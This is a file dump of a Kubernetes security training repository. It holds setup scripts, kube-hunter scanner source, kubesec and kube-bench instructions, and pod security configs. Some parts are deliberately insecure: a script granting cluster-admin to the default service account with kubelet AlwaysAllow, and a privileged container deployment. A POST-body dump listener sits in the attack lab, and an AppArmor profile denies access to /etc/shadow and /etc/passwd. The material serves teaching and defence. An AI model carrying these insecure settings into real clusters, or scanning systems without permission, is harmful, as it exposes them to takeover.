5 | sleep 5
6 | echo "Deploying Vul-Flask-Nginx Service"
7 | kubectl create -f ngflask-redis-service.yml
8 | kubectl create -f redis-service.yml


--------------------------------------------------------------------------------
/Kubernetes/VM/K8s-Cluster-Attack/setup_insecure_kube.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 | 
3 | minikube start --vm-driver=none --extra-config=kubelet.authorization-mode=AlwaysAllow
4 | sleep 5
5 | kubectl create clusterrolebinding badboy --clusterrole cluster-admin --serviceaccount=default:default
6 | echo "kubernetes initialized in insecure mode..."


--------------------------------------------------------------------------------
/Kubernetes/VM/K8s-Cluster-Attack/tornado_server.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | import tornado.ioloop
 4 | import tornado.web
 5 | import pprint
 6 | 
 7 | 
 8 | class MyDumpHandler(tornado.web.RequestHandler):
 9 |     def post(self):
10 |         pprint.pprint(self.request)
11 |         pprint.pprint(self.request.body)
12 | 
13 | if __name__ == "__main__":
14 |     tornado.web.Application([(r"/.*", MyDumpHandler),]).listen(9090)
15 |     tornado.ioloop.IOLoop.instance().start()
16 | 
17 | 


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Bench/README.md:
--------------------------------------------------------------------------------
 1 | # K8s CIS Benchmark - Kube-bench
 2 | 
 3 | 
 4 | ##### Step 1: 
 5 | 
 6 | * Navigate to the `Kube-Bench` directory
 7 | 
 8 | ```bash
 9 | cd /home/we45/container_training/Kubernetes/VM/Kube-Bench
10 | ```
11 | 
12 | 
13 | ##### Step 2: 
14 | 
15 | * To get a list of available commands and options, run the following command
16 | 
17 | ```bash
18 | ./kube-bench --help
19 | ```
20 | 
21 | 
22 | ##### Step 3: 
23 | 
24 | * To run CIS benchmark scan, run
25 | 
26 | ```bash
27 | ./kube-bench master
28 | ```
29 | 
30 | 
31 | ##### Step 4: 
32 | 
33 | * To save results to a `json` file, run the following command
34 | 
35 | If a `.json` report is necessary, run 
36 | 
37 | ```bash
38 | ./kube-bench --json master > report.json
39 | ```
40 | 


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Bench/cfg/1.8/config.yaml:
--------------------------------------------------------------------------------
 1 | ---
 2 | ## Controls Files. 
 3 | # These are YAML files that hold all the details for running checks.
 4 | #
 5 | ## Uncomment to use different control file paths.
 6 | # masterControls: ./cfg/master.yaml
 7 | # nodeControls: ./cfg/node.yaml
 8 | # federatedControls: ./cfg/federated.yaml
 9 | 
10 | master:
11 |   apiserver:
12 |     confs:
13 |       - /etc/kubernetes/manifests/kube-apiserver.yaml
14 |       - /etc/kubernetes/manifests/kube-apiserver.manifest
15 |     defaultconf: /etc/kubernetes/manifests/kube-apiserver.yaml
16 | 
17 |   scheduler:
18 |     confs: 
19 |       - /etc/kubernetes/manifests/kube-scheduler.yaml
20 |       - /etc/kubernetes/manifests/kube-scheduler.manifest
21 |     defaultconf: /etc/kubernetes/manifests/kube-scheduler.yaml
22 | 
23 |   controllermanager:
24 |     confs:
25 |       - /etc/kubernetes/manifests/kube-controller-manager.yaml
26 |       - /etc/kubernetes/manifests/kube-controller-manager.manifest
27 |     defaultconf: /etc/kubernetes/manifests/kube-controller-manager.yaml
28 | 
29 |   etcd:
30 |     confs:
31 |       - /etc/kubernetes/manifests/etcd.yaml
32 |       - /etc/kubernetes/manifests/etcd.manifest
33 |     defaultconf: /etc/kubernetes/manifests/etcd.yaml
34 | 
35 | node:
36 |   kubelet:
37 |     confs:
38 |      - /etc/systemd/system/kubelet.service.d/10-kubeadm.conf
39 |     defaultconf: /etc/systemd/system/kubelet.service.d/10-kubeadm.conf
40 |   
41 |   proxy:
42 |     confs:
43 |       - /etc/kubernetes/addons/kube-proxy-daemonset.yaml
44 |     defaultconf: /etc/kubernetes/addons/kube-proxy-daemonset.yaml
45 | 


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Bench/img/kube-bench-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/Kube-Bench/img/kube-bench-1.png


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Bench/img/kube-bench-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/Kube-Bench/img/kube-bench-2.png


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Bench/img/kube-bench-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/Kube-Bench/img/kube-bench-3.png


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Bench/img/kube-bench-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/Kube-Bench/img/kube-bench-4.png


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Bench/kube-bench:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/Kube-Bench/kube-bench


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Hunter/README.md:
--------------------------------------------------------------------------------
 1 | # Scanning K8s Cluster - Kubehunter
 2 | 
 3 | 
 4 | 
 5 | ##### Step 1: 
 6 | 
 7 | 
 8 | * Navigate to the `Kube-Hunter` directory that has `kubehunter.py` file.
 9 | 
10 | ```bash
11 | cd /home/we45/container_training/Kubernetes/VM/Kube-Hunter
12 | ```
13 | 
14 | 
15 | ##### Step 2: 
16 | 
17 | * To get a list of arguments available, run
18 | 
19 | ```bash
20 | ./kube-hunter.py --help
21 | ```
22 | 
23 | 
24 | ##### Step 3: 
25 | 
26 | * To get list of all passive and active scans, run the following command
27 | 
28 | ```bash
29 | ./kube-hunter.py --active --list
30 | ```
31 | 
32 | 
33 | ##### Step 4: 
34 | 
35 | * Start a passive scan with kube-hunter
36 | 
37 | ```bash
38 | ./kube-hunter.py
39 | ```
40 | 
41 | 
42 | ##### Step 5: 
43 | 
44 | * Select `option 2` to run a scan on the minikube instance deployed on the VM
45 | 
46 | 


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Hunter/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/Kube-Hunter/__init__.py


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Hunter/img/kube-hunter-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/Kube-Hunter/img/kube-hunter-1.png


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Hunter/img/kube-hunter-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/Kube-Hunter/img/kube-hunter-2.png


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Hunter/img/kube-hunter-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/Kube-Hunter/img/kube-hunter-3.png


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Hunter/img/kube-hunter-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/Kube-Hunter/img/kube-hunter-4.png


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Hunter/img/kube-hunter-5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/Kube-Hunter/img/kube-hunter-5.png


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Hunter/plugins/README.md:
--------------------------------------------------------------------------------
 1 | # Plugins
 2 | 
 3 | This folder contains modules that will load before any parsing of arguments by kubehunter's main module  
 4 | 
 5 | An example for using a plugin to add an argument:
 6 | ```python
 7 | # example.py
 8 | from __main__ import parser
 9 | 
10 | parser.add_argument('--exampleflag', action="store_true", help="enables active hunting")
11 | ```
12 | What we did here was just add a file to the `plugins/` folder, import the parser, and adding an argument.
13 | 
14 | All plugins in this folder gets imported right after the main arguments are added, and right before they are getting parsed, so you can add an argument that will later be used in your [hunting/discovery module](../src/README.md).
15 | 


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Hunter/plugins/__init__.py:
--------------------------------------------------------------------------------
1 | from os.path import dirname, basename, isfile
2 | import glob
3 | 
4 | # dynamically importing all modules in folder
5 | files = glob.glob(dirname(__file__)+"/*.py")
6 | for module_name in (basename(f)[:-3] for f in files if isfile(f) and not f.endswith('__init__.py')):
7 |     exec('from {} import *'.format(module_name))


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Hunter/requirements.txt:
--------------------------------------------------------------------------------
1 | netaddr
2 | netifaces
3 | enum34
4 | scapy
5 | requests
6 | PrettyTable
7 | urllib3
8 | ruamel.yaml
9 | 


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Hunter/src/__init__.py:
--------------------------------------------------------------------------------
1 | import core
2 | import modules


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Hunter/src/core/__init__.py:
--------------------------------------------------------------------------------
1 | import types
2 | import events


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Hunter/src/core/events/__init__.py:
--------------------------------------------------------------------------------
1 | from handler import *
2 | import types


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Hunter/src/core/events/types/__init__.py:
--------------------------------------------------------------------------------
 1 | from os.path import dirname, basename, isfile
 2 | import glob
 3 | 
 4 | from common import *
 5 | 
 6 | # dynamically importing all modules in folder
 7 | files = glob.glob(dirname(__file__)+"/*.py")
 8 | for module_name in (basename(f)[:-3] for f in files if isfile(f) and not f.endswith('__init__.py')):
 9 |     if module_name != "handler":
10 |         exec('from {} import *'.format(module_name))


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Hunter/src/core/types.py:
--------------------------------------------------------------------------------
 1 | class ActiveHunter(object):    
 2 |     def publish_event(self, event):
 3 |         handler.publish_event(event, caller=self)
 4 | 
 5 | 
 6 | class Hunter(object):
 7 |     def publish_event(self, event):
 8 |         handler.publish_event(event, caller=self)
 9 | 
10 | 
11 | """Kubernetes Components"""
12 | class KubernetesCluster():
13 |     """Kubernetes Cluster"""
14 |     name = "Kubernetes Cluster"
15 | 
16 | class Kubelet(KubernetesCluster):
17 |     """The kubelet is the primary "node agent" that runs on each node"""
18 |     name = "Kubelet"
19 | 
20 | 
21 | """ Categories """
22 | class InformationDisclosure(object):
23 |     name = "Information Disclosure"
24 | 
25 | class RemoteCodeExec(object):
26 |     name = "Remote Code Execution"
27 | 
28 | class IdentityTheft(object):
29 |     name = "Identity Theft"
30 | 
31 | class UnauthenticatedAccess(object):
32 |     name = "Unauthenticated Access"
33 | 
34 | class AccessRisk(object):
35 |     name = "Access Risk"
36 | 
37 | 
38 | from events import handler # import is in the bottom to break import loops


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Hunter/src/modules/__init__.py:
--------------------------------------------------------------------------------
1 | import report
2 | import discovery
3 | import hunting


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Hunter/src/modules/discovery/__init__.py:
--------------------------------------------------------------------------------
1 | from os.path import dirname, basename, isfile
2 | import glob
3 | 
4 | # dynamically importing all modules in folder
5 | files = glob.glob(dirname(__file__)+"/*.py")
6 | for module_name in (basename(f)[:-3] for f in files if isfile(f) and not f.endswith('__init__.py')):
7 |     exec('from {} import *'.format(module_name))


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Hunter/src/modules/discovery/apiserver.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | 
 3 | from ...core.types import Hunter
 4 | from ...core.events import handler
 5 | from ...core.events.types import OpenPortEvent, Service, Event
 6 | 
 7 | class ReadOnlyKubeletEvent(Service, Event):
 8 |     """The read-only port on the kubelet serves health probing endpoints, and is relied upon by many kubernetes componenets"""
 9 |     def __init__(self):
10 |         Service.__init__(self, name="Kubelet API (readonly)")
11 | 
12 | 
13 | class ApiServer(Service, Event):
14 |     """The API server is in charge of all operations on the cluster."""
15 |     def __init__(self):
16 |         Service.__init__(self, name="API Server")
17 | 
18 | @handler.subscribe(OpenPortEvent, predicate=lambda x: x.port == 443 or x.port == 6443)
19 | class ApiServerDiscovery(Hunter):
20 |     """Api Server Discovery
21 |     Checks for the existence of a an Api Server
22 |     """
23 |     def __init__(self, event):
24 |         self.event = event
25 | 
26 |     def execute(self):
27 |         main_request = requests.get("https://{}:{}".format(self.event.host, self.event.port), verify=False).text
28 |         if "code" in main_request:
29 |             self.event.role = "Master"
30 |         self.publish_event(ApiServer())
31 | 


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Hunter/src/modules/discovery/dashboard.py:
--------------------------------------------------------------------------------
 1 | import json
 2 | 
 3 | import requests
 4 | 
 5 | from ...core.events import handler
 6 | from ...core.events.types import Event, OpenPortEvent, Service
 7 | from ...core.types import Hunter
 8 | 
 9 | 
10 | class KubeDashboardEvent(Service, Event):
11 |     """A web-based Kubernetes user interface. allows easy usage with operations on the cluster"""
12 |     def __init__(self, **kargs):
13 |         Service.__init__(self, name="Kubernetes Dashboard", **kargs)     
14 | 
15 | @handler.subscribe(OpenPortEvent, predicate=lambda x: x.port == 30000)
16 | class KubeDashboard(Hunter):
17 |     """K8s Dashboard Discovery
18 |     Checks for the existence of a Dashboard
19 |     """
20 |     def __init__(self, event):
21 |         self.event = event
22 | 
23 |     @property
24 |     def secure(self):
25 |         r = requests.get("http://{}:{}/api/v1/service/default".format(self.event.host, self.event.port))
26 |         if "listMeta" in r.text and len(json.loads(r.text)["errors"]) == 0:
27 |             return False
28 |         return True
29 | 
30 |     def execute(self):
31 |         if not self.secure:
32 |             self.publish_event(KubeDashboardEvent())
33 | 


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Hunter/src/modules/discovery/ports.py:
--------------------------------------------------------------------------------
 1 | import logging
 2 | 
 3 | from socket import socket
 4 | from ...core.types import Hunter
 5 | 
 6 | from ...core.events import handler
 7 | from ...core.events.types import NewHostEvent, OpenPortEvent
 8 | 
 9 | 
10 | default_ports = [8001, 10250, 10255, 30000, 443, 6443]
11 | 
12 | @handler.subscribe(NewHostEvent)
13 | class PortDiscovery(Hunter):
14 |     """Port Scanning
15 |     Scans Kubernetes known ports to determine open endpoints for discovery
16 |     """
17 |     def __init__(self, event):
18 |         self.event = event
19 |         self.host = event.host
20 |         self.port = event.port
21 | 
22 |     def execute(self):
23 |         logging.debug("host {0} try ports {1}".format(self.host, default_ports))
24 |         for single_port in default_ports:
25 |             if self.test_connection(self.host, single_port):
26 |                 self.publish_event(OpenPortEvent(port=single_port))
27 | 
28 |     @staticmethod
29 |     def test_connection(host, port):
30 |         s = socket()
31 |         s.settimeout(1.5)
32 |         try: 
33 |             success = s.connect_ex((str(host), port))
34 |             if success == 0:
35 |                 return True
36 |         except: pass
37 |         finally: s.close()
38 |         return False
39 | 


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Hunter/src/modules/discovery/proxy.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from ...core.types import Hunter
 3 | 
 4 | from ...core.events import handler
 5 | from ...core.events.types import Service, Event, OpenPortEvent
 6 | 
 7 | class KubeProxyEvent(Event, Service):
 8 |     """proxies from a localhost address to the Kubernetes apiserver"""
 9 |     def __init__(self):
10 |         Service.__init__(self, name="Kubernetes Proxy") 
11 | 
12 | @handler.subscribe(OpenPortEvent, predicate=lambda x: x.port == 8001)
13 | class KubeProxy(Hunter):
14 |     """Proxy Discovery
15 |     Checks for the existence of a an open Proxy service
16 |     """
17 |     def __init__(self, event):
18 |         self.event = event
19 |         self.host = event.host
20 |         self.port = event.port or 8001
21 | 
22 |     @property
23 |     def accesible(self):
24 |         r = requests.get("http://{host}:{port}/api/v1".format(host=self.host, port=self.port))
25 |         if r.status_code == 200 and "APIResourceList" in r.text:
26 |             return True
27 | 
28 |     def execute(self):
29 |         if self.accesible:
30 |             self.publish_event(KubeProxyEvent())        
31 | 


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Hunter/src/modules/hunting/__init__.py:
--------------------------------------------------------------------------------
1 | from os.path import dirname, basename, isfile
2 | import glob
3 | 
4 | # dynamically importing all modules in folder
5 | files = glob.glob(dirname(__file__)+"/*.py")
6 | for module_name in (basename(f)[:-3] for f in files if isfile(f) and not f.endswith('__init__.py')):
7 |     exec('from {} import *'.format(module_name))


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Hunter/src/modules/hunting/certificates.py:
--------------------------------------------------------------------------------
 1 | from ...core.types import Hunter, KubernetesCluster, InformationDisclosure
 2 | from ...core.events import handler
 3 | from ...core.events.types import Vulnerability, Event, Service
 4 | 
 5 | import ssl
 6 | import base64
 7 | import re
 8 | 
 9 | email_pattern = re.compile(r"([a-z0-9]+@[a-z0-9]+\.[a-z0-9]+)")
10 | 
11 | class CertificateEmail(Vulnerability, Event):
12 |     """Certificate includes an email address"""
13 |     def __init__(self, email):
14 |         Vulnerability.__init__(self, KubernetesCluster, "Certificate Includes Email Address", category=InformationDisclosure)
15 |         self.email = email
16 |         self.evidence = "email: {}".format(self.email)
17 | 
18 | @handler.subscribe(Service)
19 | class CertificateDiscovery(Hunter):
20 |     """Certificate Email Hunting
21 |     Checks for email addresses in kuberntes ssl certificates
22 |     """
23 |     def __init__(self, event):
24 |         self.event = event
25 | 
26 |     def execute(self):
27 |         try:
28 |             addr = (str(self.event.host), self.event.port)
29 |             cert = ssl.get_server_certificate(addr)
30 |         except ssl.SSLError as e:
31 |             # If the server doesn't offer SSL on this port we won't get a certificate
32 |             return
33 |         c = cert.strip(ssl.PEM_HEADER).strip(ssl.PEM_FOOTER)
34 |         certdata = base64.decodestring(c)
35 |         emails = re.findall(email_pattern, certdata)
36 |         for email in emails:
37 |             self.publish_event( CertificateEmail(email=email) )


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Hunter/src/modules/hunting/dashboard.py:
--------------------------------------------------------------------------------
 1 | import json
 2 | from ...core.types import Hunter, RemoteCodeExec, KubernetesCluster
 3 | 
 4 | import requests
 5 | 
 6 | from ...core.events import handler
 7 | from ...core.events.types import Vulnerability, Event
 8 | from ..discovery.dashboard import KubeDashboardEvent
 9 | 
10 | class DashboardExposed(Vulnerability, Event):
11 |     """All oprations on the cluster are exposed"""
12 |     def __init__(self, nodes):
13 |         Vulnerability.__init__(self, KubernetesCluster, "Dashboard Exposed", category=RemoteCodeExec)
14 |         self.evidence = "nodes: {}".format(' '.join(nodes)) if nodes else None
15 | 
16 | @handler.subscribe(KubeDashboardEvent)
17 | class KubeDashboard(Hunter):
18 |     """Dashboard Hunting
19 |     Hunts open Dashboards, gets the type of nodes in the cluster
20 |     """
21 |     def __init__(self, event):
22 |         self.event = event
23 | 
24 |     def get_nodes(self):
25 |         r = requests.get("http://{}:{}/api/v1/node".format(self.event.host, self.event.port))
26 |         if r.status_code == 200 and "nodes" in r.text:
27 |             return list(map(lambda node: node["objectMeta"]["name"], json.loads(r.text)["nodes"]))
28 |         
29 |     def execute(self):
30 |         self.publish_event(DashboardExposed(nodes=self.get_nodes()))        


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Hunter/src/modules/report/__init__.py:
--------------------------------------------------------------------------------
1 | from os.path import dirname, basename, isfile
2 | import glob
3 | 
4 | # dynamically importing all modules in folder
5 | files = glob.glob(dirname(__file__)+"/*.py")
6 | for module_name in (basename(f)[:-3] for f in files if isfile(f) and not f.endswith('__init__.py')):
7 |     exec('from {} import *'.format(module_name))


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Hunter/src/modules/report/yaml.py:
--------------------------------------------------------------------------------
 1 | import StringIO
 2 | 
 3 | from ruamel.yaml import YAML
 4 | 
 5 | from collector import services, vulnerabilities
 6 | 
 7 | 
 8 | class YAMLReporter(object):
 9 |     def get_report(self):
10 |         yaml = YAML()
11 |         report = {
12 |             "nodes": self.get_nodes(),
13 |             "services": self.get_services(),
14 |             "vulnerabilities": self.get_vulenrabilities()
15 |         }
16 |         output = StringIO.StringIO()
17 |         yaml.dump(report, output)
18 |         return output.getvalue()
19 | 
20 |     def get_nodes(self):
21 |         nodes = list()
22 |         node_locations  = set()
23 |         for service in services:
24 |             node_location = str(service.host)
25 |             if node_location not in node_locations:
26 |                 nodes.append({"type": "Node/Master", "location": str(service.host)})
27 |                 node_locations.add(node_location)
28 |         return nodes
29 | 
30 |     def get_services(self):
31 |         return [{"service": service.get_name(),
32 |                  "location": "{}:{}{}".format(service.host, service.port, service.get_path()),
33 |                  "description": service.explain()}
34 |                 for service in services]
35 | 
36 |     def get_vulenrabilities(self):
37 |         return [{"location": "{}:{}".format(vuln.host, vuln.port) if vuln.host else "",
38 |                  "category": vuln.category.name,
39 |                  "vulnerability": vuln.get_name(),
40 |                  "description": vuln.explain(),
41 |                  "evidence": str(vuln.evidence)}
42 |                 for vuln in vulnerabilities]
43 | 


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Sec/README.md:
--------------------------------------------------------------------------------
 1 | # YAML Static Analyser - Kubesec
 2 | 
 3 | ###### Kubesec helps quantify risk for K8s resources based on the suggested best-practices. Lists of test run can be found at https://kubesec.io/basics/.
 4 | 
 5 | 
 6 | ##### Step 1: 
 7 | 
 8 | * Navigate to the `Kube-Sec` directory
 9 | 
10 | ```bash
11 | cd /home/we45/container_training/Kubernetes/VM/Kube-Sec
12 | ```
13 | 
14 | 
15 | ##### Step 2: 
16 | 
17 | * To analyze a Kubernetes YAML spec file, run
18 | 
19 | ```bash
20 | ./kubesec insecure_vulflask_deployment.yaml
21 | ```
22 | 
23 | 
24 | ##### Step 3:
25 | 
26 | * To save results to a file, run the following command
27 | 
28 | ```bash
29 | ./kubesec insecure_vulflask_deployment.yaml >> kubesec_result.json
30 | ```
31 | 


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Sec/img/kube-sec-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/Kube-Sec/img/kube-sec-1.png


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Sec/img/kube-sec-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/Kube-Sec/img/kube-sec-2.png


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Sec/insecure_vulflask_deployment.yaml:
--------------------------------------------------------------------------------
 1 | apiVersion: extensions/v1beta1
 2 | kind: Deployment
 3 | metadata:
 4 |   name: vul-flask
 5 | spec:
 6 |   replicas: 2
 7 |   minReadySeconds: 15
 8 |   strategy:
 9 |     type: RollingUpdate
10 |     rollingUpdate:
11 |       maxUnavailable: 1
12 |       maxSurge: 1
13 |   template:
14 |     metadata:
15 |       labels:
16 |         app: vul-flask
17 |     spec:
18 |       containers:
19 |       - image: abhaybhargav/vul_flask
20 |         imagePullPolicy: Always
21 |         name: vul-flask
22 |         ports:
23 |         - containerPort: 5050
24 |         securityContext:
25 |           # the privileged flag will be marked as a critical risk
26 |           privileged: true
27 |           readOnlyRootFilesystem: true
28 | 


--------------------------------------------------------------------------------
/Kubernetes/VM/Kube-Sec/kubesec:
--------------------------------------------------------------------------------
1 | FILE="${1:-}";
2 | [[ ! -f "${FILE}" ]] && {
3 |     echo "kubesec: ${FILE}: No such file. Please Check file path" >&2;
4 | };
5 | curl --silent --compressed --connect-timeout 5 -F file=@"${FILE}" https://kubesec.io/
6 | 


--------------------------------------------------------------------------------
/Kubernetes/VM/PodSecurityPolicy/k8s-vul-flask-redis-armor:
--------------------------------------------------------------------------------
 1 | #include <tunables/global>
 2 | profile k8s-vul-flask-redis-armor flags=(attach_disconnected,mediate_deleted) {
 3 |   #include <abstractions/base>
 4 |   file,
 5 |   network,
 6 |   capability,
 7 |   deny /app/** w, #deny file write to /app directory
 8 |   deny /tmp/** w, #deny file write to /tmp directory
 9 |   deny /etc/passwd rwklx, #deny all access to /etc/passwd
10 |   deny /etc/shadow rwklx, #deny all access to /etc/shadow
11 | 
12 |   #restrict access to HOME
13 | 
14 |   audit deny @{HOME}/.* mrwkl,
15 |   audit deny @{HOME}/.*/ rw,
16 |   audit deny @{HOME}/.*/** mrwkl,
17 |   audit deny @{HOME}/bin/ rw,
18 |   audit deny @{HOME}/bin/** mrwkl,
19 |   # @{HOME}/ r,
20 |   # @{HOME}/** rw,
21 | }
22 | 


--------------------------------------------------------------------------------
/Kubernetes/VM/PodSecurityPolicy/reverseproxy.conf:
--------------------------------------------------------------------------------
 1 | server {
 2 |     listen  80;
 3 |     server_name localhost;
 4 | 
 5 |     location / {
 6 |         proxy_bind  127.0.0.1;
 7 |         proxy_pass  http://127.0.0.1:5000;
 8 |     }
 9 | 
10 |     error_page  500 502 503 504 /50x.html;
11 |     location = /50x.html {
12 |         root    /usr/share/nginx/html;
13 |     }
14 | }


--------------------------------------------------------------------------------
/Kubernetes/VM/PodSecurityPolicy/secure-ngflask-deploy.yml:
--------------------------------------------------------------------------------
 1 | apiVersion: v1
 2 | kind: Pod
 3 | metadata:
 4 |   name: secure-ngflask-redis
 5 |   annotations:
 6 |     seccomp.security.alpha.kubernetes.io/defaultProfileName:  'docker/default'
 7 |     container.apparmor.security.beta.kubernetes.io/secure-vul-flask: 'localhost/k8s-vul-flask-redis-armor'
 8 |   labels:
 9 |     app: secure-ngflask-redis
10 | spec:
11 |   containers:
12 |     - name: nginx
13 |       image: nginx:1.11
14 |       ports:
15 |       - containerPort: 80
16 |       volumeMounts:
17 |         - mountPath: /etc/nginx/conf.d
18 |           name: config-volume
19 |     - name: redis
20 |       image: redis
21 |       ports:
22 |       - containerPort: 6379
23 |     - name: secure-vul-flask
24 |       image: abhaybhargav/secure_vul_flask
25 |       imagePullPolicy: Always
26 |       securityContext:
27 |         runAsUser: 100
28 |         runAsNonRoot: true
29 |         allowPrivilegeEscalation: false
30 |       env:
31 |         - name: REDIS_HOST
32 |           value: 127.0.0.1
33 |       ports:
34 |       - containerPort: 5000
35 |         name: vulflask-port
36 |   volumes:
37 |     - name: config-volume
38 |       configMap:
39 |         name: nginx-config
40 |         items:
41 |         - key: reverseproxy.conf
42 |           path: reverseproxy.conf


--------------------------------------------------------------------------------
/Kubernetes/VM/README.md:
--------------------------------------------------------------------------------
 1 | # [Kubernetes](README.md)
 2 | 
 3 | * ######  VM Instructions
 4 | 
 5 | ###### Important: Run the Steps in `Initial-Setup`
 6 | 
 7 | ------------------------------
 8 | 
 9 | ##### Kubernetes - Attacking A Cluster
10 | 
11 | * [Cluster Attack](K8s-Cluster-Attack/README.md)
12 | 
13 | 
14 | ##### Kubernetes - Role Based Access Control
15 | 
16 | * [Role Based Access Control](RoleBasedAccessControl/README.md)
17 | 
18 | 
19 | ##### Kubernetes - Pod Security Policy
20 | 
21 | * [Pod Security Policy](PodSecurityPolicy/README.md)
22 | 
23 | 
24 | ##### Kubernetes - Resource Quota
25 | 
26 | * [Resource Quota](ResourceQuota_Limit/README.md)
27 | 
28 | 
29 | ##### Kubernetes - Secrets
30 | 
31 | * [KubeSeal - Sealed Secrets](SealedSecrets/README.md)
32 | 
33 | 
34 | ##### Kubernetes - Vulnerability Assessment
35 | 
36 | * [Kube-Sec](Kube-Sec/README.md)
37 | 
38 | * [Kube-Bench](Kube-Bench/README.md)
39 | 
40 | * [Kube-Hunter](Kube-Hunter/README.md)
41 | 
42 | 
43 | ##### Kubernetes - Monitoring and Logging
44 | 
45 | * [Sysdig Falco](SysdigFalco/README.md)
46 | 


--------------------------------------------------------------------------------
/Kubernetes/VM/ResourceQuota_Limit/README.md:
--------------------------------------------------------------------------------
 1 | # Resource Quotas and Limits
 2 | 
 3 | ##### Step 1:
 4 | 
 5 | * Navigate to the `ResourceQuota_Limit` directory
 6 | 
 7 | ```bash
 8 | cd /home/we45/container_training/Kubernetes/VM/ResourceQuota_Limit
 9 | ```
10 | 
11 | ##### Step 2:
12 | 
13 | * Create a pod on the `default` namespace.
14 | 
15 | ```bash
16 | kubectl create -f nginx-basic-limit.yaml
17 | ```
18 | 
19 | * Ensure that the status of the pod is set to `Running`
20 | 
21 | ```bash
22 | kubectl get pods
23 | ```
24 | 
25 | ##### Step 3:
26 | 
27 | * Now test the memory consumption of the pod with the `stress` command:
28 | 
29 | * Run `kubectl exec -it nginx-resource -- stress --cpu 1 --io 1 --vm 2 --vm-bytes 100M`
30 | 
31 | * Stop it and run: `kubectl exec -it nginx-resource -- stress --cpu 1 --io 1 --vm 2 --vm-bytes 200M`
32 | 
33 | * Stop it and run `kubectl exec -it nginx-resource -- stress --cpu 1 --io 1 --vm 2 --vm-bytes 400M`
34 | 
35 | * It can be observed that the stress test fails with `exit code 1` at 400M because of the limit specified in Pod Spec. 
36 | 
37 | 


--------------------------------------------------------------------------------
/Kubernetes/VM/ResourceQuota_Limit/nginx-basic-limit.yaml:
--------------------------------------------------------------------------------
 1 | apiVersion: v1
 2 | kind: Pod
 3 | metadata:
 4 |   name: nginx-resource
 5 |   namespace: default
 6 | spec:
 7 |   containers:
 8 |   - image: sharathwe45/nginx-stress
 9 |     name: nginx
10 |     resources:
11 |       requests:
12 |         memory: 400Mi
13 |       limits:
14 |         memory: 500Mi


--------------------------------------------------------------------------------
